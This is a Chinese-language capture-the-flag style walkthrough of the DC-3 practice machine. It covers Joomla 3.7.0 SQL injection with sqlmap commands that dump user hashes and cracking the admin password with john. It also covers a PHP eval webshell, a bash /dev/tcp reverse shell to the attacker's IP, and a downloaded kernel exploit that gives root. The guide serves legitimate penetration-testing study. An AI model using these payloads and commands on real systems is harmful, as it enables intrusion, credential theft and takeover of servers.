DC-3靶机

DC-3

1.网卡的修改

1.1在开机时按下Shift键进入以下界面，

1.2在上个页面按下e键，进入如下界面

1.3将ro 替换为 rw signie init=/bin/bash

1.4按下Ctrl键+X键，进入如下页面

1.5查看当前网卡IP信息 ip a

1.6编辑网卡配置文件vim /etc/network/interfacers

1.7保存，退出，重启网卡服务/etc/init.d/networking restart

1.8查看IP状态

1.9重启靶机，即可获取到Ip地址

2.查找IP，找到靶机的地址

192.168.242.1 靶机ip地址

3对靶机Ip地址扫描

找到开放端口：80 以及漏洞：joomla

4.登录网站

发现提示说此靶机只有一个flag和一个入口，而且从wappalyzer中看到的cms和nmp扫描出来的一样是joomal

5.对漏洞进行扫描

（1）joomscan扫描

安装joomscan
apt-get install joomscan -y
​
扫描：
joomscan --url http://192.168.242.1/

发现了joomal的版本号，还有网站的其他路径
administrator

（2）dirb扫描

dirb是一个基于字典的web目录扫描工具，查找现有的（和/或隐藏的）Web对象，通过对Web服务器发起基于字典的攻击并分析响应的数据。 采用递归的方式来获取更多的目录，它还支持代理和http认证限制访问的网站，是在信息收集阶段获取目标信息常用工具手段。

扫描：
dirb http://192.168.242.1/

（3）CMSeek扫描

CMSeeK是一个CMS的漏洞检测和利用套件

CMSeeK安装：
git clone https://github.com/Tuhinshubhra/CMSeeK

6.更新sqlamp

（1）查看文件位置

cat /usr/share/

（2）卸载并重新下载

卸载：rm - rf sqlamp
下载：git clone https://github.com/sqlmapproject/sqlmap

（3）安装并更新

安装：apt-get install gnutls-bin
     git config --global http.sslVerify false
     git config --global http.postBuffer 1048576000
     
更新：sqlamp -h

7.搜索漏洞

“searchsploit”是一个用于Exploit-DB的命令行搜索工具，可以帮助我们查找渗透模块。
​
Exploit-DB是一个漏洞库，kali中保存了一个该漏洞库的拷贝，利用上面提到的命令就可以查找需要的渗透模块，它将搜索所有的漏洞和shellcode而且该漏洞库是保存在本地的，在没有网络的情况下也可以使用

searchsploit joomla 3.7.0

可以看到存在sql注入，后面显示有路径，在网上查了一下可以在
​
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt查看

Using Sqlmap:
​
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

8.对sqlmap信息查看

sqlmap -u "http://10.9.136.146/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

既然有了数据库那就继续查表，查joomladb这个表
​
为了方便了解，建议大家把注入的参数放在后面
​
使用sqlmap语句查询当前数据库
​
sqlmap -u "http://10.9.136.146/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]
​

查看数据库表：
sqlmap -u "http://10.9.136.146/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D 'joomladb'  --tables  -p list[fullordering]

查看表里的内容：
sqlmap -u "http://10.9.136.146/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D 'joomladb'  -T '#__users' --columns  -p list[fullordering]
​

 查询username、password字段里面的内容：
sqlmap -u "http://10.9.136.146/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D 'joomladb'  -T '#__users' -C 'username,password' --dump  -p list[fullordering]

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

得到后台密码后，先复制密码保存进1.txt，然后拿到john爆破一下：
vim 1.txt   #按下Esc键后，输入:wq保存退出
cat 1.txt
john 1.txt 

密码：snoopy

9.登录

得到后台账号密码，登录靶机joomla框架的后台
admin
snoopy

10.上传shell文件

（1）上传地方

 

（2）选择创建一个新文件，并且写入一句话木马

<?php
eval($_POST[1]);
?>

访问路径：http://10.9.136.146/templates/beez3/html/shell.php

无显示，说明成功

11.反弹shell

1.在蚁剑查看反弹shell

在终端中，使用各种命令，可以看出他的权限不够，无法反弹成功，则可以在网站上传反弹指令，直接反弹。
于是回到网页上传页面，创建了一个反弹shell的php文件。
​
<?php
system ("bash -c 'bash -i  >& /dev/tcp/10.9.136.146/4444  0>&1'");
?>
​

注：这里的ip地址为kali的ip地址

重新输入后，在kali中输入：
nc -lvp 4444
开启攻击机的监听口，准备接收shell。

访问反弹shell的网页，使php命令执行。
​
http://10.9.136.146/templates/beez3/shell.php

12.提权

更改为交互式shell后，我们先查看还可以使用什么命令。
​
cat /etc/sudoers
sudo -l
​

用操作系统漏洞提权，先查看linux版本。
cat /etc/issue

 发现版本是Ubuntu 16.04 ，使用searchsploit工具进行搜索。
​
searchsploit Ubuntu 16.04

 发现一个提权漏洞（Privilege Escalation  特权升级），具体查看一下。
​
searchsploit -p linux/local/39772.txt

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

这里他告诉了可以使用溢出提权（exp提权），并提供了提权工具，以及使用方法，使用wget进行工具下载。
​
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

下载成功，我们进行解压。
​
unzip -n 39772.zip
解压后发现其实提权工具都在exploit.tar包中，上传到靶机的目录中
​

 在shell中进行解压。
​
tar -xvf exploit.tar

 进入解压后的目录中，按照searchsploit工具中的提示进行提权。
​
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh
./doubleput

​
发现已经提到了root权限，进入root文件夹，查看flag，至此DC-3靶机已经被打穿。
​
cd root
ls
cat the-flag.txt

总结

1.首先我们进行主机发现，将测试机的网站进行了指纹扫描，发现它的框架是Joomla且找到了后台管理页面，然后进入百度搜索相关漏洞，发现了有自动化扫描漏洞工具joomscan，扫描出了网站框版本为Joomla 3.7.0。
​
2.我们先用msf进行漏洞扫描，发现有但是不可上线，再用searchsploit工具进行搜索，发现了网站sql注入漏洞，使用工具提供的sqlmap注入语句将账户与密码的哈希值跑出，在使用kali自带的john工具破解哈希值，得到真正的密码,登陆了后台管理系统。
​
3.在后台管理系统中挖呀挖呀挖，挖到了文件上传漏洞，上传了一句话木马用于连接蚁剑，有上传了反弹shell代码，拿到shell，再使用python改为交互式shell。
​
4.我们使用了cat /etc/sudoers  sudo -l等命令想查找可用命令提权，发现没有；于是想到了linux版本提权，使用cat /etc/issue命令发现linux版本为Ubuntu 16.04，再次使用searchsploit工具进行搜索，发现了提权漏洞，是一个溢出提权（exp提权），并给出了提权工具以及使用方法，根据提示方法最终提到root权限，在root目录下发现了flag
​